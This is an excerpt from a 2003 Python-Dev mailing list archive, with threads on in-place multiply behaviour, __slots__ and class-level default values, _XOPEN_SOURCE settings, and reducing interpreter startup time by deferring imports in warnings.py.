References: <000401c31974$ac31c730$6801a8c0@NICKLEBY> <20030513183144.GH11289@unpythonic.net>
Message-ID: <b9rg0i$9tm$1@main.gmane.org>

"Jeff Epler" <jepler@unpythonic.net> wrote in message
news:20030513183144.GH11289@unpythonic.net...
> There must be something more to your problem than what you
described.
>
> The following executes just fine for me (ditto if NewKoke is a
subclass
> of object instead of list, and no matter whether I define
__getitem__ or
> not [a guess based on your remark about 'multiply a sequence']):
>
> $ python dubois.py
> sausages vegetable-style breakfast patty
> sausages vegetable-style breakfast patty

On Win98 2.2.1, cut and paste into interactive window outputs
sausages vegetable-style breakfast patty
sausages []

> class Klassic:
>     def __imul__(self, other):
>         return "sausages"
>     def __getitem__(self, i): return None
>
> class NewKoke(list):
>     def __imul__(self, other):
>         return "vegetable-style breakfast patty"
>     def __getitem__(self, i): return None
>
> k = Klassic()
> o = NewKoke()
>
> k *= 1
> o *= 1
>
> print k, o
>
> k = Klassic()
> o = NewKoke()
>
> k *= "spam"
> o *= "spam"

Because the line above gives
TypeError: can't multiply sequence to non-int

> print k, o

Maybe something has been 'fixed' since then.

Terry J. Reedy





From drifty@alum.berkeley.edu  Tue May 13 20:44:48 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Tue, 13 May 2003 12:44:48 -0700
Subject: [Python-Dev] Need some patches checked
In-Reply-To: <1052836839.973.6.camel@slothrop.zope.com>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>	 <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net> <1052836839.973.6.camel@slothrop.zope.com>
Message-ID: <3EC14B30.1000102@ocf.berkeley.edu>

Jeremy Hylton wrote:

> There are a bunch of open bugs and patches for urllib2.  I've cleaned up
> a few things lately.  We might make a concerted effort to close them all
> for 2.3b2.  Whole-scale refactoring can be more effective that a large
> set of small fixes.
> 

Aw, but Jeremey, I wanted to start working on the AST branch after I 
finished going through the open bugs and patches one time!  =)

We can and I am willing to help, but I suspect it would be best to first 
get the test suite rewritten; it is severely lacking.

Which reminds me, I need to finish writing urllib's tests by doing the 
network-requiring ones.

-Brett



From marc@informatik.uni-bremen.de  Tue May 13 20:58:45 2003
From: marc@informatik.uni-bremen.de (Marc Recht)
Date: Tue, 13 May 2003 21:58:45 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
References: <200305121813.36383.harri.pasanen@trema.com>
 <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
Message-ID: <8560000.1052855925@leeloo.intern.geht.de>


> Of course, it would be sufficient to set it to a smaller value on
> systems that support only older X/Open issues; I think I'd accept a
> patch that changes this (if the patch is correct, of course).
Defining __EXTENSIONS__ could also help. IIRC it works just like
_GNU_SOURCE/_NETBSD_SOURCE.

Regards,
Marc

mundus es fabula



From mrussell@verio.net  Tue May 13 21:08:25 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 21:08:25 +0100
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Tue, 13 May 2003 12:00:08 EDT."
 <20030513160008.1261.22301.Mailman@mail.python.org>
Message-ID: <E19Fg4X-0002AL-00@straylight>

>How about this patch?

Thanks - I tried that with my script and it worked nicely.  Hopefully this is
as complex as os.walk() needs to get.

Mark




From jepler@unpythonic.net  Tue May 13 21:15:50 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Tue, 13 May 2003 15:15:50 -0500
Subject: [Python-Dev] Re: Inplace multiply
In-Reply-To: <b9rg0i$9tm$1@main.gmane.org>
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY> <20030513183144.GH11289@unpythonic.net> <b9rg0i$9tm$1@main.gmane.org>
Message-ID: <20030513201549.GJ11289@unpythonic.net>

On Tue, May 13, 2003 at 03:12:50PM -0400, Terry Reedy wrote:
> On Win98 2.2.1, cut and paste into interactive window outputs
> TypeError: can't multiply sequence to non-int
> 
> > print k, o
> 
> Maybe something has been 'fixed' since then.

using RedHat9's "2.2.2-26" here.

Jeff


From martin@v.loewis.de  Tue May 13 21:57:22 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 13 May 2003 22:57:22 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <8560000.1052855925@leeloo.intern.geht.de>
References: <200305121813.36383.harri.pasanen@trema.com>
 <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>
 <8560000.1052855925@leeloo.intern.geht.de>
Message-ID: <m365oe1s5p.fsf@mira.informatik.hu-berlin.de>

Marc Recht <marc@informatik.uni-bremen.de> writes:

> Defining __EXTENSIONS__ could also help. IIRC it works just like
> _GNU_SOURCE/_NETBSD_SOURCE.

We do define __EXTENSIONS__, this is not the issue. We define
_XOPEN_SOURCE to 600 on all systems, because that is the highest value
specified by any X/Open spec today. The system may not support all of
the latest Posix features; this is not a problem because we
autoconfiscate them.

The problem really only occurs if somebody thinks they need to define
_XOPEN_SOURCE to some other value; the compiler will then complain.

Regards,
Martin



From tdelaney@avaya.com  Tue May 13 22:32:49 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:32:49 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>

> From: Raymond Hettinger [mailto:raymond.hettinger@verizon.net]
>
> class Pane(object):
>     __slots__ = ('background', 'foreground', 'size', 'content')
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
>
> p = Pane()
> p.background = 'light blue'     # override the default
> assert p.foreground == 'white' # other defaults still in-place

Wow - I hadn't realised that.

I would prefer to think of this as a useful feature rather than a wart.
Finally we can have true constants!

class Pane (module): # Or whatever - you get the idea ;)

    __slots__ = ('background', 'foreground', 'size', 'content',
                 '__name__', '__file__')
    __name__ = globals()['__name__']
    __file__ = globals()['__file__']

    background = 'black'
    foreground = 'white'
    size = (80, 25)

import sys
sys.modules[__name__] = Pane()

OK - so you could get around it by getting the class of the "module" and
then modifying that ... but it's the best yet.  It even tells you that
the attribute is read-only!

Tim Delaney


From guido@python.org  Tue May 13 22:38:10 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 17:38:10 -0400
Subject: [Python-Dev] __slots__ and default values
In-Reply-To: Your message of "Wed, 14 May 2003 07:32:49 +1000."
 <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>
References: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30C@au3010avexu1.global.avaya.com>
Message-ID: <200305132138.h4DLcA930451@odiug.zope.com>

> I would prefer to think of this as a useful feature rather than a
> wart. Finally we can have true constants!

Yuck.  If you want that, define a property-like class that doesn't
allow setting.

These "constants" of yours are easily subverted by defining a subclass
which adds an instance __dict__ (any subclass that doesn't define
__slots__ of its own does this).
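
A minimal sketch of such a property-like class (the name 'readonly' is
made up, not an existing API):

    class readonly(object):
        # data descriptor that allows reading but never setting
        def __init__(self, value):
            self.value = value
        def __get__(self, obj, objtype=None):
            return self.value
        def __set__(self, obj, value):
            raise AttributeError("read-only attribute")

    class Pane(object):
        background = readonly('black')

    p = Pane()
    p.background           # -> 'black'
    p.background = 'blue'  # raises AttributeError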

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tdelaney@avaya.com  Tue May 13 22:40:10 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:40:10 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30D@au3010avexu1.global.avaya.com>

> From: Delaney, Timothy C (Timothy)
>
> class Pane (module): # Or whatever - you get the idea ;)
>
>     __slots__ = ('background', 'foreground', 'size',
>                  'content', '__name__', '__file__')
>     __name__ = globals()['__name__']
>     __file__ = globals()['__file__']
>
>     background = 'black'
>     foreground = 'white'
>     size = (80, 25)
>
> import sys
> sys.modules[__name__] = Pane()

Hmm ... I was just wondering if we could use this technique to gain the
advantages of fast lookup in other modules automatically (but optionally).

The idea is, the last line of your module includes a call which transforms
your module into a module subclass instance with slots.

The functions in the module become methods which access the *class*
instance variables (so they can modify them) but other modules can't.

A fair bit of work, and probably not worthwhile, but it's interesting to
think about ;)

Tim Delaney


From tdelaney@avaya.com  Tue May 13 22:42:51 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:42:51 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30E@au3010avexu1.global.avaya.com>

> From: Guido van Rossum [mailto:guido@python.org]
>
> > I would prefer to think of this as a useful feature rather than a
> > wart. Finally we can have true constants!
>
> Yuck.  If you want that, define a property-like class that doesn't
> allow setting.
>
> These "constants" of yours are easily subverted by defining a subclass
> which adds an instance __dict__ (any subclass that doesn't define
> __slots__ of its own does this).

Sorry - missing smiley there ;)

But see my other post for a potentially useful side-effect of this.  Not
something I think should be done, but fun to think about.

The idea is that you shouldn't be able to create a subclass without some
really nasty work, as the only way to get it is to determine what module
the module subclass is defined in, then grab the class out of that.

But it's a horrible hack and I should never have suggested it ;)

Tim Delaney


From lkcl@samba-tng.org  Tue May 13 23:57:40 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Tue, 13 May 2003 22:57:40 +0000
Subject: [Python-Dev] sf.net/708007: expectlib.py telnetlib.py split
Message-ID: <20030513225740.GH2305@localhost>

[i am not on the python-dev list but i check the archives, please cc me]

approximately two years ago i needed the functionality outlined
in the present telnetlib.py for several other remote protocols,
most notably commands (including ssh and bash) and also HTTP.

i figure that this functionality should be more than invaluable
to other python developers.

for example even the existing python libraries such as the
ftp client ftplib.py, which makes extensive use of regular
expressions to parse commands, could possibly benefit from
rewrites using the "new" expectlib.py.

also i believe it's the sort of thing that the twisted crowd
should already have invented, and they're mad if they haven't
already got something similar.


this message is therefore just a polite ping to the regular
python developers that the above referenced patch appears not
to have yet been looked at or assigned to anybody.

that having been said (perhaps with unintended implications
of criticism that the regular python developers are slackers,
which i most certainly am NOT saying!):

the expectlib.py / telnetlib.py split is not exactly a top
priority - just the sort of thing that one python fanatic
would classify as "nice to have".

l.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From python@rcn.com  Wed May 14 02:12:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Tue, 13 May 2003 21:12:03 -0400
Subject: [Python-Dev] Re: __slots__ and default values
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
Message-ID: <002301c319b5$d44b8580$febd958d@oemcomputer>

> Aahz replies:
> > Why not do the initializing in __init__?
> 
> Michael:
> I presume that Raymond's concern was not that there wouldn't be
> a way to do initialization, but that this would become a new c.l.p
> FAQ and point of confusion for newbies. Unfortunately, I fear
> that it will. 

Yes.  Since it "works" with classic classes and unslotted newstyle
classes, it isn't terribly unreasonable to believe it would work 
with __slots__.  Further, there is no reason it couldn't work (either 
through an autoinit upon instance creation or through a default 
entry that references the class variable).

> Michael:
> Already I am seeing that people are "discovering"
> class variables as a sort of "initialized instance variable"
> instead of using __init__ as they "ought" to. Of course, it's NOT
> an initialized instance variable, but newbies stumble across it
> and seem to prefer it to using __init__.

Perhaps I skipped school the day they taught that was bad, but
it seems perfectly reasonable to me and I'm sure it is a common
practice.  I even find it to be clearer and more maintainable than
using __init__.  The only downside I see is that self.classvar += 1
reads from and writes to a different place.

So, a reworded version of my question is "why not?".  What is
the downside of providing behavior that is similar to non-slotted
classes?  What is gained by blocking an assignment and
reporting a read-only error?

When I find an existing class can be made lighter by using __slots__,
it would be nice to transform it with a single line.  From:

class Tree(object):
    left = None
    right = None
    def __init__(self, value):
        self.value = value

adding only one line:
    __slots__ = ('left', 'right', 'value')

It would be a bummer to also have to move the left/right = None
into __init__ and transform them into self.left = self.right = None.

> Duncan Booth:
> The following works, but I can't remember whether you're supposed to be 
> able to use a dict in __slots__ or if it just happens to be allowed:
>
> >>> class Pane(object):
> __slots__ = { 'background': 'black', 'foreground': 'white',
>       'size': (80, 25) }
> def __init__(self):
> for k, v in self.__slots__.iteritems():
> setattr(self, k, v)

__slots__ accepts any iterable.  So, yes, you're allowed
even though that particular use was not intended.

There are several possible workarounds including metaclasses.
My question is why there needs to be a workaround at all.


> Thomas Heller:
> Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
> presents __slots__ as a way to constrain the instance variables:
> 
> A new-style class can define a class attribute named __slots__ to
>  constrain the list of legal attribute names.

Though I think of __slots__ as a way to make lighter weight instances,
constraining instance variables is also one of its functions. 


Raymond Hettinger


From guido@python.org  Wed May 14 02:38:27 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 21:38:27 -0400
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: "Your message of Tue, 13 May 2003 21:12:03 EDT."
 <002301c319b5$d44b8580$febd958d@oemcomputer>
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
 <002301c319b5$d44b8580$febd958d@oemcomputer>
Message-ID: <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>

> Yes.  Since it "works" with classic classes and unslotted newstyle
> classes, it isn't terribly unreasonable to believe it would work 
> with __slots__.  Further, there is no reason it couldn't work (either 
> through an autoinit upon instance creation or through a default 
> entry that references the class variable).

Really?  The metaclass would have to copy the initializers to a
safekeeping place, because they compete with the slot descriptors.
Don't forget that when you write __slots__ = ['a', 'b', 'c'],
descriptors named a, b and c are inserted into the class dict by the
metaclass.  And then the metaclass would have to add a hidden
initializer that initializes the slot.  Very messy...
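
Roughly, the metaclass's __new__ would have to do something like this
before letting type.__new__ create the slot descriptors (a sketch with
made-up names, just to show how messy it gets):

    class SlotInitMeta(type):
        def __new__(meta, name, bases, ns):
            saved = {}
            for attr in ns.get('__slots__', ()):
                if attr in ns:                  # competes with the descriptor
                    saved[attr] = ns.pop(attr)  # move it to safekeeping
            cls = type.__new__(meta, name, bases, ns)
            cls._slot_defaults = saved
            return cls
        # ...and __call__ (or a hidden initializer) would then have to copy
        # cls._slot_defaults into the slots of every new instance.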

> > Michael:
> > Already I am seeing that people are "discovering"
> > class variables as a sort of "initialized instance variable"
> > instead of using __init__ as they "ought" to. Of course, it's NOT
> > an initialized instance variable, but newbies stumble across it
> > and seem to prefer it to using __init__.
> 
> Perhaps I skipped school the day they taught that was bad, but
> it seems perfectly reasonable to me and I'm sure it is a common
> practice.  I even find it to be clearer and more maintainable than
> using __init__.  The only downside I see is that self.classvar += 1
> reads from and writes to a different place.

It's also a bad idea for initializers that aren't immutable, because
the initial values are shared between all instances (another example
of the "aliasing" problem, also known from default argument values).

> So, a reworded version of my question is "why not?".  What is
> the downside of providing behavior that is similar to non-slotted
> classes?  What is gained by these blocking an assignment and
> reporting a read-only error?

It's not like I did any work to prevent what you want from working.
Rather, what you seem to want would be hard to implement (see above).

> When I find an existing class can be made lighter by using __slots__,
> it would be nice to transform it with a single line.  From:
> 
> class Tree(object):
>     left = None
>     right = None
>     def __init__(self, value):
>         self.value = value
> 
> adding only one line:
>     __slots__ = ('left', 'right', 'value')
> 
> It would be a bummer to also have to move the left/right = None
> into __init__ and transform them into self.left = self.right = None.

Maybe I should remove slots from the language?  <0.5 wink> They seem
to be the most widely misunderstood feature of Python 2.2.  If you
don't understand how they work, please don't use them.

> > Duncan Booth:
> > The following works, but I can't remember whether you're supposed to be 
> > able to use a dict in __slots__ or if it just happens to be allowed:
> >
> > >>> class Pane(object):
> > __slots__ = { 'background': 'black', 'foreground': 'white',
> >       'size': (80, 25) }
> > def __init__(self):
> > for k, v in self.__slots__.iteritems():
> > setattr(self, k, v)
> 
> __slots__ accepts any iterable.  So, yes, you're allowed
> eventhough that particular use was not intended.

This loophole was intentionally left for people to find a good use for.

> There are several possible workarounds including metaclasses.
> My question is why there needs to be a workaround at all.

I hope that has been answered by now.

> > Thomas Heller:
> > Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
> > presents __slots__ as a way to constrain the instance variables:
> > 
> > A new-style class can define a class attribute named __slots__ to
> >  constrain the list of legal attribute names.
> 
> Though I think of __slots__ as a way to make lighter weight instances,
> constraining instance variables is also one of its functions. 

Not true.  That is at best an unintended side effect of slots.  And
there's nothing against having __slots__ include __dict__, so your
instance has a __dict__ as well as slots.
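
For example (with 2.3, at least; names are illustrative):

    class C(object):
        __slots__ = ('x', '__dict__')   # slots *and* an instance __dict__

    c = C()
    c.x = 1            # stored in the slot
    c.whatever = 2     # also fine; lands in c.__dict__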

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Wed May 14 07:51:24 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 14 May 2003 02:51:24 -0400
Subject: [Python-Dev] Re: __slots__ and default values
References: <1052839518.3ec10e5e3f7c0@mcherm.com> <002301c319b5$d44b8580$febd958d@oemcomputer> <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003e01c319e5$3d044100$8427c797@oemcomputer>

> It's also a bad idea for initializers that aren't immutable, because
> the initial values are shared between all instances (another example
> of the "aliasing" problem, also known from default argument values).

Right.  I once knew that and had forgotten.


> > Though I think of __slots__ as a way to make lighter weight instances,
> > constraining instance variables is also one of its functions. 
> 
> Not true.  That is at best an unintended side effect of slots.  And
> there's nothing against having __slots__ include __dict__, so your
> instance has a __dict__ as well as slots.

That's something I never knew but wish I had known (and I *have*
read the source).  Live and learn.


Raymond








From mwh@python.net  Wed May 14 10:53:04 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 14 May 2003 10:53:04 +0100
Subject: [Python-Dev] Inplace multiply
In-Reply-To: <000401c31974$ac31c730$6801a8c0@NICKLEBY> ("Paul Dubois"'s
 message of "Tue, 13 May 2003 10:25:38 -0700")
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <2mvfwdsvlr.fsf@starship.python.net>

"Paul Dubois" <paul@pfdubois.com> writes:

> My "masked array" class MA has a problem that I don't know how to solve. The
> inplace multiply function
>
>     def __imul__ (self, other)
>
> is not getting called, while my other inplace operations do work. The scenario
> is
>
> x = MA.array(...)
>
> x *= c
>
> If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
> a message from the Python runtime saying it can't multiply a sequence by a
> non-int. But change MA to Numeric, it works.
>
> Numeric is an extension type and MA is a (new style) class. MA defines
> __len__ as well as all the math operators.

What version of Python?  This smells like a bug that has been
(thought) fixed.

Cheers,
M.

-- 
  The ability to quote is a serviceable substitute for wit.
                                                -- W. Somerset Maugham


From guido@python.org  Wed May 14 15:03:08 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 10:03:08 -0400
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: Your message of "Wed, 14 May 2003 02:51:24 EDT."
 <003e01c319e5$3d044100$8427c797@oemcomputer>
References: <1052839518.3ec10e5e3f7c0@mcherm.com> <002301c319b5$d44b8580$febd958d@oemcomputer> <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>
 <003e01c319e5$3d044100$8427c797@oemcomputer>
Message-ID: <200305141403.h4EE38F25569@odiug.zope.com>

> > Not true.  That is at best an unintended side effect of slots.  And
> > there's nothing against having __slots__ include __dict__, so your
> > instance has a __dict__ as well as slots.
> 
> That's something I never knew but wish I had known (and I *have*
> read the source).  Live and learn.

Actually I think that's new in 2.3.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paul@pfdubois.com  Wed May 14 16:12:35 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Wed, 14 May 2003 08:12:35 -0700
Subject: [Python-Dev] inplace multiply problem was a bug that has been fixed
Message-ID: <000101c31a2b$4048e1e0$6801a8c0@NICKLEBY>

My question about inplace multiply was answered by Todd Miller: it was a bug
in Python that is now fixed. I upgraded and my problem went away.



From jeremy@zope.com  Wed May 14 16:55:57 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 14 May 2003 11:55:57 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
Message-ID: <1052927757.7258.38.camel@slothrop.zope.com>

I don't know if this thread came to any conclusion.  I did the same
strace that everyone else has reported on, and I've included a summary
of the results here.  I have one directory in my PYTHONPATH, which
affects the number of directories that are searched for each imported
module.

Comparing Python 2.3 current CVS with Python 2.2 CVS, I see the
following system call counts (limited to top 6 in 2.3).

         2.3   2.2
open     305   104
stat64   102    44
fstat64   74    34
read      71    30
rt_sig... 69    68
brk       62    74

When a single module is imported from the standard library, Python 2.2
looks in 10 different places.  Specifically, it looks for five different
files in two different directories -- PYTHONPATH and the std library
directory.  For files that aren't found (e.g. sitecustomize), it looks
in 25 places (5 files x 5 directories).  Interesting to note that
PYTHONPATH directory is not searched for sitecustomize.

In Python 2.3, the standard library module requires 15 lookups because
/usr/local/lib/python23.zip is added to the path before the std library
directory.  The failed lookup of sitecustomize takes 35 lookups, because
PYTHONPATH and python23.zip are now on the path.

The list of attempted imports is much larger in 2.3 than in 2.2.

 -- 2.3 --                     -- 2.2 --
                             __future__
codecs
copy_reg                     copy_reg
encodings
encodings/__init__
encodings/aliases
encodings/iso_8859_15
exceptions
linecache
os                           os
posixpath                    posixpath
re
site                         site
sitecustomize                sitecustomize
sre
sre_compile
sre_constants
sre_parse
stat                         stat
string
strop
types                        types
UserDict                     UserDict
warnings
  22 total                     7 total

The increases in open, stat64, and fstat64 all seem consistent with a 3x
increase in the number of modules searched for.

The use of re in the warnings module seems to be the primary culprit, since it
pulls in re, sre and friends, string, and strop.

Jeremy




From noah@noah.org  Wed May 14 17:34:32 2003
From: noah@noah.org (Noah Spurrier)
Date: Wed, 14 May 2003 09:34:32 -0700
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
Message-ID: <3EC27018.9020503@noah.org>

Tell me more about expectlib.py. Is it pty based?
I ask because I wonder if it's like my pexpect module:
     http://pexpect.sourceforge.net/

Yours,
Noah



From python@rcn.com  Wed May 14 17:55:22 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 14 May 2003 12:55:22 -0400
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
References: <3EC27018.9020503@noah.org>
Message-ID: <003001c31a39$9c554d80$7c22a044@oemcomputer>

> Tell me more about expectlib.py. Is it pty based?
> I ask because I wonder if it's like my pexpect module:
>      http://pexpect.sourceforge.net/

Hello Noah,

Googling for "expect.py" gives several useful hits:
   http://www.google.com/search?sourceid=navclient&q=expect%2Epy

If those don't answer your question, I recommend posting to
the comp.lang.python newgroup where you can benefit from
the experiences of hundreds of users.

The python-dev list isn't a good place to follow-up because
these kinds of questions are not the primary focus here.


Raymond Hettinger


From skip@pobox.com  Wed May 14 18:35:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 12:35:13 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1052927757.7258.38.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
Message-ID: <16066.32337.635236.691405@montanaro.dyndns.org>

    Jeremy> I don't know if this thread came to any conclusion.  

I don't think so.  I think it bogged down about the time I suggested that
executing import from within a function might slow things down.

    Jeremy> The use of re in the warnings module seems the primary culprit,
    Jeremy> since it pulls in re, sre and friends, string, and strop.

I just peeked at warnings.py.  None of the uses of re.* in there seem like
they'd be in time-critical functions.  The straightforward change (migrate
"import re" into the functions which use the module) worked for me, so I
went ahead and checked it in.

Skip


From guido@python.org  Wed May 14 18:37:22 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 13:37:22 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Wed, 14 May 2003 10:33:55 PDT."
 <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <200305141737.h4EHbMv06730@odiug.zope.com>

> Modified Files:
> 	warnings.py 
> Log Message:
> defer re module imports to help improve interpreter startup

Are you sure that's going to help?  "import warnings" calls
_processoptions() and makes a few calls to filterwarnings() which
brings in the re module anyway...

--Guido van Rossum (home page: http://www.python.org/~guido/)



From jeremy@zope.com  Wed May 14 18:45:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 14 May 2003 13:45:33 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16066.32337.635236.691405@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <16066.32337.635236.691405@montanaro.dyndns.org>
Message-ID: <1052934332.7260.45.camel@slothrop.zope.com>

On Wed, 2003-05-14 at 13:35, Skip Montanaro wrote:
>     Jeremy> I don't know if this thread came to any conclusion.  
> 
> I don't think so.  I think it bogged down about the time I suggested that
> executing import from within a function might slow things down.
> 
>     Jeremy> The use of re in the warnings module seems the primary culprit,
>     Jeremy> since it pulls in re, sre and friends, string, and strop.
> 
> I just peeked at warnings.py.  None of the uses of re.* in there seem like
> they'd be in time-critical functions.  The straightforward change (migrate
> "import re" into the functions which use the module) worked for me, so I
> went ahead and checked it in.

Guido and I looked at that briefly.  It doesn't make any difference does
it?  The functions that use re are called when the module is imported.

Jeremy




From skip@pobox.com  Wed May 14 19:02:05 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:02:05 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <200305141737.h4EHbMv06730@odiug.zope.com>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
 <200305141737.h4EHbMv06730@odiug.zope.com>
Message-ID: <16066.33949.903064.834797@montanaro.dyndns.org>

    >> defer re module imports to help improve interpreter startup

    Guido> Are you sure that's going to help?  "import warnings" callse
    Guido> _processoptions() and makes a few calls to filterwarnings() which
    Guido> brings in the re module anyway...

Apparently not. :-( The call to _processoptions() won't hurt unless the user
invokes the interpreter with a -W arg.  Not much we can do there.  I think
the import in filterwarnings can be avoided by deferring the re compilation
until warn_explicit.  I'll see what I can come up with and submit a patch.

Skip


From skip@pobox.com  Wed May 14 19:02:42 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:02:42 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1052934332.7260.45.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <16066.32337.635236.691405@montanaro.dyndns.org>
 <1052934332.7260.45.camel@slothrop.zope.com>
Message-ID: <16066.33986.472857.935825@montanaro.dyndns.org>

    Jeremy> Guido and I looked at that briefly.  It doesn't make any
    Jeremy> difference does it?  The functions that use re are called when
    Jeremy> the module is imported.

You're right.  I'll come up with something.

Skip





From jepler@unpythonic.net  Wed May 14 19:08:03 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 14 May 2003 13:08:03 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <16066.33986.472857.935825@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <16066.32337.635236.691405@montanaro.dyndns.org> <1052934332.7260.45.camel@slothrop.zope.com> <16066.33986.472857.935825@montanaro.dyndns.org>
Message-ID: <20030514180801.GN11289@unpythonic.net>

On Wed, May 14, 2003 at 01:02:42PM -0500, Skip Montanaro wrote:
> 
>     Jeremy> Guido and I looked at that briefly.  It doesn't make any
>     Jeremy> difference does it?  The functions that use re are called when
>     Jeremy> the module is imported.
> 
> You're right.  I'll come up with something.

I'd suggested (or I think I suggested) that re needs to only be imported
when message != "" in filterwarnings.  The other use, in _processoptions
-> _setoption, is only hit when sys.warnoptions has a non-empty value.

This still leaves the usage of re in
encodings.__init__.normalize_encoding(), which I also suggested moving
into the function -- however, I never checked when .normalize_encoding()
is called, so it might always be hit at startup anyway.  It could also be
rewritten with plain string operations, roughly as sketched below.
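
For what it's worth, a regex-free version might look roughly like this
(assuming all it needs to do is collapse runs of non-alphanumeric
characters into single underscores -- I haven't checked the real
function's exact semantics):

    def normalize_encoding(encoding):
        chars = []
        pending = False
        for c in encoding:
            if c.isalnum() or c == '.':
                if pending and chars:
                    chars.append('_')
                pending = False
                chars.append(c)
            else:
                pending = True
        return ''.join(chars)

    # normalize_encoding('ISO 8859-15')  ->  'ISO_8859_15'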

Jeff


From skip@pobox.com  Wed May 14 19:14:43 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:14:43 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <16066.33949.903064.834797@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
